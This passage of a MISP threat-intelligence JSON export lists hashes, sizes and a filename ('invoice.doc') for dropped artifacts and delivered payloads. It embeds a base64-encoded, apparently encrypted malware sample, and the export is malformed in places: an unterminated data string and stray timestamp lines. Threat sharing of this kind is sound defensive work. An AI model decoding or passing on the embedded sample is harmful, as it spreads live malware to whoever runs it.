"value": "7993ebdea9421a85b431077b2d89ee3344180759"
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850335",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a35f-6a6c-4327-9200-407c0a0a020f",
"value": "17b8571df60a9953f7e50edcd623eca414ce9bae64362ba3ab0069778cf40a1a"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850335",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a35f-08a4-48b9-9556-4aeb0a0a020f",
"value": "2864"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "17",
"timestamp": "1583850410",
"uuid": "5e67a3aa-e8c0-4340-8080-475b0a0a020f",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1583850410",
"to_ids": true,
"type": "malware-sample",
"uuid": "5e67a3aa-2ad4-4b54-9a8f-49720a0a020f",
"value": "invoice.doc|d627615f955dd5342ef6b4c6938ad98c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1583850410",
"to_ids": false,
"type": "filename",
"uuid": "5e67a3aa-e0b4-4408-900d-43500a0a020f",
"value": "invoice.doc"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1583850410",
"to_ids": true,
"type": "md5",
"uuid": "5e67a3aa-5950-4d9f-865d-40480a0a020f",
"value": "d627615f955dd5342ef6b4c6938ad98c"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1583850410",
"to_ids": true,
"type": "sha1",
"uuid": "5e67a3aa-1be4-45b9-b565-4fb50a0a020f",
"value": "645467b3207a50c43be075a0b81308a5f6935c59"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1583850410",
"to_ids": true,
"type": "sha256",
"uuid": "5e67a3aa-2888-452a-855d-4f2b0a0a020f",
"value": "1a508909a8ef020ab5285ce47106beac317c2ae0d2971eff9a4f95a5079eee7f"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1583850410",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5e67a3aa-2e74-45b4-8d8e-48e50a0a020f",
"value": "441560"
}
]
}
2023-04-21 13:25:09 +00:00
]
2023-12-14 14:30:15 +00:00
}
2023-04-21 13:25:09 +00:00
}